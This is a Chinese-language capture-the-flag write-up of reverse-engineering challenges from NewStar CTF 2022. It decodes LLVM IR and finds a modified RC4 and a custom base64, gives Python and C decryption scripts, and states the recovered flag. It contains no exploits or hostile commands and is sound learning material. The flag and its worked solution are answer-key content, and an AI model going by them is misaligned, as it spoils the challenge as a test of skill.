input[6] = ((input[6] + 1 - 3 + 2 + 3) ^ 3 - 2) ^ 3
input[11] = ((input[11] + 174) ^ (112 - 174 + 4) - 2 + 3 + 2 - 4) & 0xff
input[21] = (((input[21] - 3) ^ 2 + 3 + 236 + 236) ^ 3) & 0xff
input[9] = ((input[9] + 2) ^ 2 + 1 - 3 - 2 - 20 + 1) & 0xff
input[28] = ((input[28] ^ 28-1) ^ 28-3-1 + 1)
input[15] = (((input[15]-(53-177^165)) ^ 3 + 2) ^ 3)&0xff
input[16] = (((input[16]-3-2) + 3) ^ 227 -2)&0xff
input[8] = (((input[8]-(53+53)^43) + 3-3-1) ^ 43)&0xff
input[1] = ((input[1]) ^ 1-178)&0xff
input[13] = ((input[1]) ^ 2) ^ 3 ^ 1
input[24] = (((input[24]) + 1) ^ 1) ^ 3
input[12] = ((input[12])-1-3 + 4) ^ 3
input[27] = ((input[27]-57-1-2) ^ 1 -3-1+ 3)
print(bytes(input))
# for i in range(len(input)):
# print(chr(input[i] & 0xff), end='')
数据一直不对,不断排查后,猜测是位处理的问题,程序中的字符是无符号整型:
u_int8_t 处理后【写了个c脚本还是错误!!!!】
魔幻的问题!!再试一次!!! 【还是不可以】
【不知道哪里出了问题,等WP吧!!!】
babycode (middle)
0x01 llvm 中间代码 .ll 了解
语言参考手册 — LLVM 16.0.0git 文档
(175条消息) LLVM IR(一)——如何使用LLVM编译执行代码_七妹要奈斯的博客-CSDN博客_llvm 生成ir
LLVM IR入门指南(1)——LLVM架构简介 - 知乎 (zhihu.com)
LLVM编译流程——全详解(快来看史上最细解析!!) | 码农家园 (codenong.com)
这里尝试将 .ll 转化为 .out 可执行文件。
Ubuntu 环境安装:
sudo apt-get install llvm
sudo apt-get install clang
# 安装失败
kali clang 环境: 【环境自带】
将C文件编译为LLVM bitcode 文件
clang -o3 -emit-llvm hello.c -c -o hello.bc
由于.bc 是bitcode的二进制格式,.ll 文件 llvm bitcode 的可读文本
clang -o3 -emit-llvm hello.c -S -o hello.ll
llvm-dis 工具反汇编llvm bitcode 文件, 可以将bc文件转为.ll文件
llvm-dis hello.bc
用 llvm-as 工具通过汇编文件(.ll 文件)得到字节码文件(.bc 文件)
llvm-as hello.ll hello.bc
.bc编译成.o
第一种方法:用clang直接将其编译为可执行文件
clang a.o.bc -o struct
第二种方法:用llc先将bc编译为汇编,再用本地的gcc将其编译为可执行文件。
llc a.o.bc -o hello.s
gcc hello.s -o hello
编译生成可执行文件
clang hello.c -o hello
或者
clang -emit-llvm -c hello.c
.bc到.s编译指令
clang -S -fobjc-arc struct.bc -o struct.s
使用如下命令转换:
llvm-as task.ll task.bc
显然出题人,修改了!【避免这个解题思路】--->【当时做题的错误判断】
还是得分析.ll llvm 中间文件
【其实这里改为:
llvm-as task.ll -o task.bc
就可以很快将将ll中间文件转化为 可执行文件!!!,0x05 就是这种思路
】
【但当时本着学习的态度,没深究就直接学习llvm .ll 中间代码去了,也比较曲折】
0x02 分析 .ll 中间文件算法流程
@ - 全局变量
% - 局部变量
alloca - 在当前执行的函数的堆栈帧中分配内存,当该函数返回到其调用者时,将自动释放内存
i32 - 32位4字节的整数
align - 对齐
load - 读出,store写入
icmp - 两个整数值比较,返回布尔值
br - 选择分支,根据条件来转向label,不根据条件跳转的话类型goto
label - 代码标签
call - 调用函数
(175条消息) (LLVM)中间语言(IR)基本语法简介_wy7980的博客-CSDN博客_ir中间语言
(176条消息) LLVM IR / LLVM指令集入门_Canliture的博客-CSDN博客_llvm指令集
Rc4 加密的分析:
%22 = getelementptr inbounds [9 x i8], [9 x i8]* %3, i64 0, i64 0
%23 = load i32, i32* %4, align 4
call void @Rc4_Init(i8* %22, i32 %23) // 传入密钥即密钥长度
%24 = getelementptr inbounds [42 x i8], [42 x i8]* %2, i64 0, i64 0
call void @Rc4_Encrypt(i8* %24, i32 16)
知道 rc4 密钥key="llvmbitc"
# 同时调用了两次rc4 加密,
# 中间有一段xor 加密 // input[pos+16]^=input[pos]
# 如下
rc4_enc(input,16)
for pos in range(16)
input[pos+16]^=input[pos]
rc4_enc(input[16],16)
魔改 Base64 分析:
%22 = getelementptr inbounds i8, i8* %19, i64 %21 // 取出当前处理字符
%23 = load i8, i8* %22, align 1
%24 = zext i8 %23 to i32 // 类型强制转化
%25 = ashr i32 %24, 2 // 算数右移两位 input[i]>>2
%26 = add nsw i32 %25, 59 // input[i]+59
%27 = trunc i32 %26 to i8 // 强制转化 相当于 &0xff
%28 = load i8*, i8** %6, align 8
%29 = load i32, i32* %9, align 4
%30 = sext i32 %29 to i64
%31 = getelementptr inbounds i8, i8* %28, i64 %30 // 存储base64 编码串
store i8 %27, i8* %31, align 1
%32 = load i8*, i8** %4, align 8
%33 = load i32, i32* %7, align 4
%34 = sext i32 %33 to i64
%35 = getelementptr inbounds i8, i8* %32, i64 %34
%36 = load i8, i8* %35, align 1
%37 = zext i8 %36 to i32
%38 = and i32 %37, 3 // 获取第一个字符 低两位
%39 = shl i32 %38, 4 // 左移四位
# 这里的编码思路就是:
# 每三个字符,24位,切分成4断,每段6位。
# 将6位对应的值 (value+ 59)&0xff 则是编码后的值。
0x03 深入分析 llvm中间代码算法流程
对上面流程实现解密!
# encoding=utf-8
from Crypto.Cipher import ARC4
enc = 'TSz`kWKgbMHszXaj`@kLBmRrnTxsNtZsSOtZzqYikCw'
for i in range(len(enc)):
print((ord(enc[i])),end=',')
print()
for i in range(len(enc)):
print(str(bin((ord(enc[i])-59)&0xff)[2:].zfill(6)), end='')
print()
enc_ = '0110010110001111111001011100000111000100001011001001110100100011011110001111110111011001101011111001010001011100000100010001111100100101111101111100110110011111011110000100111110010111111110000110000101001110010111111111111101100111101011101100000010001111'
print()
for i in range(0, len(enc_), 8):
print(hex(int(enc_[i:i + 8], 2)), end=',')
chipher = [0x65, 0x8f, 0xe5, 0xc1, 0xc4, 0x2c, 0x9d, 0x23, 0x78, 0xfd, 0xd9, 0xaf, 0x94, 0x5c, 0x11, 0x1f, 0x25, 0xf7,
0xcd, 0x9f, 0x78, 0x4f, 0x97, 0xf8, 0x61, 0x4e, 0x5f, 0xff, 0x67, 0xae, 0xc0, 0x8f]
chipher1=[0x65, 0x8f, 0xe5, 0xc1, 0xc4, 0x2c, 0x9d, 0x23, 0x78, 0xfd, 0xd9, 0xaf, 0x94, 0x5c, 0x11, 0x1f]
chipher2=[0x25, 0xf7, 0xcd, 0x9f, 0x78, 0x4f, 0x97, 0xf8, 0x61, 0x4e, 0x5f, 0xff, 0x67, 0xae, 0xc0, 0x8f]
print()
# rc4 解密
key=b'llvmbitc\00'
# key=b'<--- NewStarCTF2022 --->\x00'
cipher_text2 = bytes(chipher2)
print(cipher_text2)
# 两次rc4
cipher = ARC4.new(key)
decrypt_text2 = cipher.decrypt(cipher_text2)
# 中间1次xor
decrypt_text2=list(decrypt_text2)
for i in range(0,len(decrypt_text2)):
decrypt_text2[i]^=chipher[i]
print(decrypt_text2)
cipher_text1= bytes(chipher1)
print(cipher_text1)
# cipher = ARC4.new(key)
decrypt_text1 = cipher.decrypt(cipher_text1)
print(list(decrypt_text1),decrypt_text2)
解密发现得不出flag!!!
排查之后,发现应该是rc4 也被魔改了!
RC4加密算法原理简单理解 - 沉默的赌徒 - 博客园 (cnblogs.com)
# 初始化
@Rc4_Init(key,len) # 分析发现,无魔改
key=b'llvmbitc\x00'
for i in range(256):
s[i]=i
t[i]=key[i%len]
j = 0;
for i in range(256):
j = (j + S[i] + T[i]) mod 256;
swap(S[i] , S[j]);
# 加密
@Rc4_Encrypt(input,len)
for i in range(len):
i = (i + 1) mod 256;
j = (j + S[i]) mod 256;
swap(S[i] , S[j]);
//t = (S[i] + S[j]) mod 256;
t=S[(S[i] + S[j]) mod 256]
k=t^0x89 // 魔改位置, 多xor 89
//可以直接在这里进行加密,当然也可以将密钥流保存在数组中,最后进行异或就ok
input[]=input[i]^k; //进行加密
rc4 就是加了一个 xor 89 的操作
0x04 解密分析
现在梳理一下加密流程:
rc4_enc(input,16) xor 89
for pos in range(16)
input[pos+16]^=input[pos]
rc4_enc(input[16],16) xor 89
enc=b64encode(input[],32)
比较密文
chipher = [0x65, 0x8f, 0xe5, 0xc1, 0xc4, 0x2c, 0x9d, 0x23, 0x78, 0xfd, 0xd9, 0xaf, 0x94, 0x5c, 0x11, 0x1f,
0x25, 0xf7, 0xcd, 0x9f, 0x78, 0x4f, 0x97, 0xf8, 0x61, 0x4e, 0x5f, 0xff, 0x67, 0xae, 0xc0, 0x8f]
chipher1 = [0x65, 0x8f, 0xe5, 0xc1, 0xc4, 0x2c, 0x9d, 0x23, 0x78, 0xfd, 0xd9, 0xaf, 0x94, 0x5c, 0x11, 0x1f]
chipher2 = [0x25, 0xf7, 0xcd, 0x9f, 0x78, 0x4f, 0x97, 0xf8, 0x61, 0x4e, 0x5f, 0xff, 0x67, 0xae, 0xc0, 0x8f]
for i in range(len(chipher)):
chipher[i] ^= 89
if i > 15:
chipher[i] = chipher[i]^chipher[i - 16]^89
# rc4 解密
key = b'llvmbitc\x00'
cipher_text = bytes(chipher)
# 两次rc4 可以合并
cipher = ARC4.new(key)
decrypt_text = cipher.decrypt(cipher_text)
print()
print(decrypt_text)
print(list(decrypt_text))
但解密发现还是不对,猜测可能原因是Rc4 前后两次加密,共用一次初始化的S盒,但第二次加密下标从0开始,且使用第一次Rc4加密后的S盒,这里显然是耦合的,显然只能写脚本解密,py调用模板肯定用不了!
写了个 c脚本,也无用!!!直接蒙蔽,,,
#include<stdio.h>
/*
RC4初始化函数
*/
void rc4_init(unsigned char* s, unsigned char* key, unsigned long Len_k)
{
int i = 0, j = 0;
char k[256] = { 0 };
unsigned char tmp = 0;
for (i = 0; i < 256; i++) {
s[i] = i;
k[i] = key[i % Len_k];
}
for (i = 0; i < 256; i++) {
j = (j + s[i] + k[i]) % 256;
tmp = s[i];
s[i] = s[j];
s[j] = tmp;
}
}
/*
RC4加解密函数
unsigned char* Data 加解密的数据
unsigned long Len_D 加解密数据的长度
unsigned char* key 密钥
unsigned long Len_k 密钥长度
*/
void rc4_crypt(unsigned char* Data, unsigned long Len_D, unsigned char* key, unsigned long Len_k) //加解密
{
unsigned char s[256];
rc4_init(s, key, Len_k);
int i = 0, j = 0, t = 0;
unsigned long k = 0;
unsigned char tmp;
for (k = 0; k < Len_D/2; k++) {
i = (i + 1) % 256;
j = (j + s[i]) % 256;
tmp = s[i];
s[i] = s[j];
s[j] = tmp;
t = (s[i] + s[j]) % 256;
Data[k] = Data[k] ^ s[t]^89;
printf("0x%x,",s[t]^89);
}
printf("\n");
i=0,j=0,t=0;
for (k = 0; k < Len_D/2; k++) {
i = (i + 1) % 256;
j = (j + s[i]) % 256;
tmp = s[i];
s[i] = s[j];
s[j] = tmp;
t = (s[i] + s[j]) % 256;
Data[k+16] = Data[k+16] ^ s[t]^89;
printf("0x%x,",s[t]^89);
}
printf("\n");
}
int main()
{
//字符串密钥
// unsigned char key[] = "zstuctf";
unsigned char key[] ="llvmbitc";
unsigned long key_len = sizeof(key) -1 ;
// //数组密钥
// unsigned char key[] = {0x6c,0x6c,0x76,0x6d,0x62,0x69,0x74,0x63,0x0};
// unsigned long key_len = sizeof(key);
//加解密数据
// unsigned char data[] = { 0x7E, 0x6D, 0x55, 0xC0, 0x0C, 0xF0, 0xB4, 0xC7, 0xDC, 0x45,
// 0xCE, 0x15, 0xD1, 0xB5, 0x1E, 0x11, 0x14, 0xDF, 0x6E, 0x95,
// 0x77, 0x9A, 0x12, 0x99 };
unsigned char data[]={0x65,0x8f,0xe5,0xc1,0xc4,0x2c,0x9d,0x23,0x78,0xfd,0xd9,0xaf,0x94,0x5c,0x11,0x1f,0x25,0xf7,0xcd,0x9f,0x78,0x4f,0x97,0xf8,0x61,0x4e,0x5f,0xff,0x67,0xae,0xc0,0x8f};
unsigned char data1[]={0x65,0x8f,0xe5,0xc1,0xc4,0x2c,0x9d,0x23,0x78,0xfd,0xd9,0xaf,0x94,0x5c,0x11,0x1f,0x25,0xf7,0xcd,0x9f,0x78,0x4f,0x97,0xf8,0x61,0x4e,0x5f,0xff,0x67,0xae,0xc0,0x8f};
//加解密
rc4_crypt(data, sizeof(data), key, key_len);
for (int i = 0; i < sizeof(data); i++)
{
if (i>15)
{
printf("%c,", data[i]^data1[i-16]);
}
else
{
printf("%c,", data[i]);
}
}
printf("\n");
return 0;
}
哪分析错了呢!,先缓缓,后面再来做!!!
0x05 .ll 转化为 elf 再探索
后面又尝试以将中间代码转化为可执行文件的思路
└─# llvm-as task.ll task.bc
llvm-as: Too many positional arguments specified!
Can specify at most 1 positional arguments: See: llvm-as --help
┌──(root㉿xiaoxiao)-[~/ida_]
└─# llvm-as task.ll -o task.bc
┌──(root㉿xiaoxiao)-[~/ida_]
└─# clang task.bc -o task
# 原来,最开始是由于少了 -o 造成 .ll 到 .bc 转化失败!!!
导出task可执行程序后,ida分析elf 文件
发现,一直遗漏了一个细节!!!base64 编码是,第2、3是交换了位置的!
同时,多出2个字节的编码也有改动!【显然,对llvm 中间代码的分析还是有点马虎】【其他加密逻辑是分析清楚了的】
# encoding=utf-8
from Crypto.Cipher import ARC4
enc = 'TSz`kWKgbMHszXaj`@kLBmRrnTxsNtZsSOtZzqYikCw='
for i in range(len(enc)):
print((ord(enc[i])), end=',')
print()
for i in range(0, len(enc)-4, 4):
print(str(bin((ord(enc[i]) - 59) & 0xff)[2:].zfill(6)), end='')
print(str(bin((ord(enc[i + 2]) - 59) & 0xff)[2:].zfill(6)), end='')
print(str(bin((ord(enc[i + 1]) - 59) & 0xff)[2:].zfill(6)), end='')
print(str(bin((ord(enc[i + 3]) - 59) & 0xff)[2:].zfill(6)), end='')
# base64 最后 = 处理
for i in range(len(enc)-4,len(enc),4):
print(str(bin((ord(enc[i]) - 59) & 0xff)[2:].zfill(6)), end='')
print(str(bin((ord(enc[i + 1]) - 59) & 0xff)[2:].zfill(6)), end='')
print(str(bin(((ord(enc[i + 2]) - 59)>>2) & 0xf)[2:].zfill(6)), end='')
print('0'*6)
print()
enc_ = '011001111111011000100101110000010000011100101100100111001101010010111000111111100110011101101111100101110000000101010001000111010111110010110111110011111101011001111000010011011111111001111000011000111001010100011111111111011110110110101110110000001000001111000000'
print()
for i in range(0, len(enc_), 8):
print(hex(int(enc_[i:i + 8], 2)), end=',')
chipher = [0x67,0xf6,0x25,0xc1,0x7,0x2c,0x9c,0xd4,0xb8,0xfe,0x67,0x6f,0x97,0x1,0x51,0x1d,0x7c,0xb7,0xcf,0xd6,0x78,0x4d,0xfe,0x78,0x63,0x95,0x1f,0xfd,0xed,0xae,0xc0,0x83,0xc0]
如下,再用C脚本解密得到:
#include<stdio.h>
/*
RC4初始化函数
*/
void rc4_init(unsigned char* s, unsigned char* key, unsigned long Len_k)
{
int i = 0, j = 0;
char k[256] = { 0 };
unsigned char tmp = 0;
for (i = 0; i < 256; i++) {
s[i] = i;
k[i] = key[i % Len_k];
}
for (i = 0; i < 256; i++) {
j = (j + s[i] + k[i]) % 256;
tmp = s[i];
s[i] = s[j];
s[j] = tmp;
}
}
/*
RC4加解密函数
unsigned char* Data 加解密的数据
unsigned long Len_D 加解密数据的长度
unsigned char* key 密钥
unsigned long Len_k 密钥长度
*/
void rc4_crypt(unsigned char* Data, unsigned long Len_D, unsigned char* key, unsigned long Len_k) //加解密
{
unsigned char s[256];
rc4_init(s, key, Len_k);
int i = 0, j = 0, t = 0;
unsigned long k = 0;
unsigned char tmp;
for (k = 0; k < Len_D/2; k++) {
i = (i + 1) % 256;
j = (j + s[i]) % 256;
tmp = s[i];
s[i] = s[j];
s[j] = tmp;
t = (s[i] + s[j]) % 256;
Data[k] = Data[k] ^ s[t]^89;
printf("0x%x,",s[t]^89);
}
printf("\n");
i=0,j=0,t=0;
for (k = 0; k < Len_D/2; k++) {
i = (i + 1) % 256;
j = (j + s[i]) % 256;
tmp = s[i];
s[i] = s[j];
s[j] = tmp;
t = (s[i] + s[j]) % 256;
Data[k+16] = Data[k+16] ^ s[t]^89;
printf("0x%x,",s[t]^89);
}
printf("\n");
}
int main()
{
//字符串密钥
// unsigned char key[] = "zstuctf";
unsigned char key[] ="llvmbitc";
unsigned long key_len = sizeof(key) -1 ;
// //数组密钥
// unsigned char key[] = {0x6c,0x6c,0x76,0x6d,0x62,0x69,0x74,0x63,0x0};
// unsigned long key_len = sizeof(key);
//加解密数据
// unsigned char data[] = { 0x7E, 0x6D, 0x55, 0xC0, 0x0C, 0xF0, 0xB4, 0xC7, 0xDC, 0x45,
// 0xCE, 0x15, 0xD1, 0xB5, 0x1E, 0x11, 0x14, 0xDF, 0x6E, 0x95,
// 0x77, 0x9A, 0x12, 0x99 };
unsigned char data[]={0x67,0xf6,0x25,0xc1,0x7,0x2c,0x9c,0xd4,0xb8,0xfe,0x67,0x6f,0x97,0x1,0x51,0x1d,0x7c,0xb7,0xcf,0xd6,0x78,0x4d,0xfe,0x78,0x63,0x95,0x1f,0xfd,0xed,0xae,0xc0,0x83};
unsigned char data1[]={0x67,0xf6,0x25,0xc1,0x7,0x2c,0x9c,0xd4,0xb8,0xfe,0x67,0x6f,0x97,0x1,0x51,0x1d,0x7c,0xb7,0xcf,0xd6,0x78,0x4d,0xfe,0x78,0x63,0x95,0x1f,0xfd,0xed,0xae,0xc0,0x83};
//加解密
rc4_crypt(data, sizeof(data), key, key_len);
for (int i = 0; i < sizeof(data); i++)
{
if (i>15)
{
printf("%c", data[i]^data1[i-16]);
}
else
{
printf("%c", data[i]);
}
}
printf("\n");
return 0;
}
flag{Hacking_for_fun@reverser$!q
【这里最后一字节,是'q'不是'}'的原因在于,base64 编码时,有个&0xf的操作,导致信息丢失,但由于只有一位也就不爆破了】
得到flag:
flag{Hacking_for_fun@reverser$!}
【注:这题学到了很多东西,对.ll中间代码语法摸了个小透,但由于base64 编码的小细节没注意到,导致做题时还是很曲折的,最后转化为可执行文件进行逆向才成功破案】
结语
这次 NewStar CTF 2022 公开赛,体验很好。我回顾了很多Re方面的知识点,也学习到了一些新的东西。从Week2 开始参赛,直到 Week5 结束,主攻逆向题目,做了少量Web题。Re 题除了Week5 的 Virtual Self 没做出来,其他全部解出,这是十分鼓舞人心的,当然也算是一个不圆满的小遗憾了吧!【没能Ak Week2-Week5 的所有Re】。
最后对自己有一点小小(笑笑)的展望:希望接下来,能在中等难度比赛中有所突破【相对应的,也就是在逆向水平方面有所提高】!
